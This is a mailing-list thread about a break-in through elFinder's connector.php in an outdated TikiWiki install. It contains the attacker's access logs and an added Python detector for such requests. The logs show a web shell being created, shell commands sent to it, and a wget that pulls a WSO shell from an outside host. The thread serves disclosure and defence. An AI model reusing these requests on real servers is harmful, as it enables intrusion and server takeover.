elfinder security problem


elfinder security problem

Marco Schmidt
Hello,

Searching the mailing lists, I didn't find a message related to my
issue.

I just saw (by accident) that somebody broke into my server via elfinder.
My server does not run the newest version 12 (an upgrade is on the to-do list).
But in the SVN source I saw that elfinder did not change in the newest
version.

The attacker used the "connector.php" to get access directly to the
filesystem. Some PHP scripts were added: one to get shell access to the
host and another one with mailer functionality.

Attached you can find the logs.
I hope this helps others to identify a possible break-in.

Greetings ...
 Marco


41.230.44.35 - - [15/Jul/2016:19:08:40 +0200] "GET
/vendor_extra/elfinder/php/connector.php HTTP/1.1" 200 27 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:08:41 +0200] "GET /favicon.ico
HTTP/1.1" 200 1150
"http://servername/vendor_extra/elfinder/php/connector.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:12:36 +0200] "GET
///vendor_extra/elfinder/php/connector.php?cmd=mkfile&name=p0c.php&target=l1_Lw
HTTP/1.1" 200 134 "-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:36 +0200] "POST
///vendor_extra/elfinder/php/connector.php HTTP/1.1" 200 137 "-"
"Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:38 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=id HTTP/1.1" 200 66 "-"
"Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:42 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=ls%20-la HTTP/1.1" 200 284
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:46 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=uname%20-a HTTP/1.1" 200 71
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:13 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=wget%20http%3A//www.w0rms.com/shell/wso.txt%20%26%26%20mv%20wso.txt%20index1.php
HTTP/1.1" 200 - "-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:16 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=ls%20-la HTTP/1.1" 200 350
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:26 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3259 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:13:41 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3313
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:13:51 +0200] "GET
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 1279 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:14:13 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 1498
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:15:23 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 10457
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:17:58 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 307013
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
178.241.194.8 - - [15/Jul/2016:19:49:08 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3311
"http://w0rms.com/oku/sayfa.php?sayfa=1" "Mozilla/5.0 (Windows NT 6.1;
rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:49:17 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 24586
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:50:28 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3203
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:50:47 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3304
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:53:26 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3311 "-"
"Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"

------------------------------------------------------------------------------
What NetFlow Analyzer can do for you? Monitors network bandwidth and traffic
patterns at an interface-level. Reveals which users, apps, and protocols are
consuming the most bandwidth. Provides multi-vendor support for NetFlow,
J-Flow, sFlow and other flows. Make informed decisions using capacity planning
reports.http://sdm.link/zohodev2dev
_______________________________________________
TikiWiki-users mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/tikiwiki-users
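As an added example, not code from the thread or from Tiki/elFinder: a small Python detector for the two signals visible in Marco's logs, a connector.php write command (mkfile here) whose file name carries a server-executable extension, and a later 200 for a .php file under the elFinder files/ upload root. The sample log lines are constructed in the shape of the ones above with TEST-NET addresses; the target decoding assumes elFinder's volume-prefixed base64 hash format, under which the logged l1_Lw is the volume root /.

```python
# Flag elFinder connector abuse in Apache combined logs: (1) a connector.php write
# command naming a server-executable file, (2) a 200 for an executable under the upload root.
import base64
import re
from urllib.parse import parse_qs, unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')
WRITE_CMDS = {"mkfile", "put", "upload", "rename", "paste", "extract", "archive"}
EXEC_EXT = re.compile(r"\.(?:php\d?|phtml|phar)\b", re.I)
def decode_hash(h):
    """elFinder target hash (assumed format): '<volume>_' + base64 of the path with '+/=' written as '-_.'; 'l1_Lw' -> '/'."""
    enc = h.partition("_")[2].translate(str.maketrans("-_.", "+/="))
    try:
        return base64.b64decode(enc + "=" * (-len(enc) % 4)).decode()
    except (ValueError, UnicodeDecodeError):
        return None
def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    raw_path, _, query = rec["uri"].partition("?")
    rec["path"] = re.sub(r"/{2,}", "/", unquote(raw_path))  # collapse "///x" to "/x"
    rec["query"] = {k: v[0] for k, v in parse_qs(query).items()}
    return rec
def classify(rec):
    """Return a finding string, or None when the request looks benign."""
    path, q = rec["path"], rec["query"]
    if path.endswith("/elfinder/php/connector.php"):
        cmd, name = q.get("cmd", ""), q.get("name", "")
        if cmd in WRITE_CMDS and EXEC_EXT.search(name):
            return f"connector {cmd} of executable {name!r} in {decode_hash(q.get('target', ''))!r}"
        return None  # put/upload send cmd in the POST body: rely on signal (2) below
    if "/elfinder/files/" in path and EXEC_EXT.search(path) and rec["status"] == "200":
        return "executable served from upload root" + (f" with cmd={q['cmd']!r}" if "cmd" in q else "")
    return None
def scan(log_text):
    """Return [(ip, timestamp, finding), ...] for every suspicious line."""
    recs = filter(None, map(parse_line, log_text.splitlines()))
    return [(r["ip"], r["ts"], f) for r in recs if (f := classify(r))]

# Constructed sample in the shape of the thread's logs (TEST-NET IPs, not real hosts).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jul/2016:19:12:36 +0200] "GET ///vendor_extra/elfinder/php/connector.php?cmd=mkfile&name=p0c.php&target=l1_Lw HTTP/1.1" 200 134 "-" "Python-urllib/2.7"
203.0.113.7 - - [15/Jul/2016:19:12:38 +0200] "GET ///vendor_extra/elfinder/files/p0c.php?cmd=id HTTP/1.1" 200 66 "-" "Python-urllib/2.7"
198.51.100.4 - - [15/Jul/2016:19:20:01 +0200] "GET /vendor_extra/elfinder/php/connector.php?cmd=open&target=l1_Lw&init=1 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Jul/2016:19:20:09 +0200] "GET /vendor_extra/elfinder/files/report.pdf HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
"""
```

Run `scan(SAMPLE_LOG)` to get the two findings from the first IP and nothing for the second, whose ordinary open and PDF download pass through.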

Re: elfinder security problem

Xavier de Pedro (Tiki)
Hi Marco:

Yes, thanks for the information. This issue/hole is patched in the latest release, available since a few days ago, once you perform a standard upgrade to the latest 12.x in your case, using either the upgrade through the tiki-install.php web interface or "php console.php d:u" as usual on the terminal.

And next time, please do not report this type of information in public channels such as this list but send the information to [hidden email]

Thanks!

Xavi

On 15 July 2016 21:03:02 CEST, Marco Schmidt <[hidden email]> wrote:

--
Sent from my Android device with K-9 Mail. Please excuse my brevity.

Re: elfinder security problem

Marco Schmidt
Hello Xavi,

you're right, such a security report should not be sent to a public channel.

It would be perfect to put a note somewhere on the SourceForge
project page which points to the security email address. Maybe on
the "Support" page?

I have now upgraded to 12.9 and I will go for 15 as soon as I have converted my
theme to the new theme structure.

Greetings ...
 Marco


On 16.07.2016 00:13, Xavier de Pedro wrote:

> Hi Marco:
>
> Yes, thanks for the information. This issue/hole is patched in the last
> release available since days ago, once you perform a standard upgrade to
> latest 12.x in your case, using either the upgrade through the
> tiki-install.php web interface, or with "php console.php d:u" as usual
> on the terminal.
>
> And for next times, please do not report this type of information in
> public channels such as this list but send the information to
> [hidden email]
>
> Thanks!
>
> Xavi


Re: elfinder security problem

Xavier de Pedro (Tiki)
Thanks, Marco. I didn't know how to change the support info page at
sf.net for our project, therefore I added a quick note on the summary
page with the few characters left to add info there:
https://sourceforge.net/projects/tikiwiki/

Thanks!

Xavi

On 18/07/16 at 10:34, Marco Schmidt wrote:

> Hello Xavi,
>
> you're right, such a security report should not be sent to a public channel.
>
> It would be perfect to put a line of note somewhere on the sourceforge
> project page which gives a hint to the security email address. Maybe on
> the "Support" page?
>
> I have now upgraded to 12.9 and I will go for 15 as soon as I have converted my
> theme to the new theme structure.
>
> Greetings ...
>  Marco
>
>
> On 16.07.2016 00:13, Xavier de Pedro wrote:
>> Hi Marco:
>>
>> Yes, thanks for the information. This issue/hole is patched in the last
>> release available since days ago, once you perform a standard upgrade to
>> latest 12.x in your case, using either the upgrade through the
>> tiki-install.php web interface, or with "php console.php d:u" as usual
>> on the terminal.
>>
>> And for next times, please do not report this type of information in
>> public channels such as this list but send the information to
>> [hidden email]
>>
>> Thanks!
>>
>> Xavi

